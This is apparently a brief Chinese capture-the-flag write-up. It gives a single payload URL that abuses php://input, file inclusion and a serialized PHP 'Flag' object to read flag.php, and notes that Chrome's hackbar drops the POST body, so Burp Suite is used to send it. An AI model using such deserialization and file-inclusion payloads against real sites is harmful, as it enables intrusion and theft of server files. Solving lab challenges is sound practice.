没什么好写的,payload:

    1. /?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

    问题主要在于Chrome的hackbar有一个bug,在没有参数的情况下,不会将post框中的内容提交上去,需要用burpsuit请求。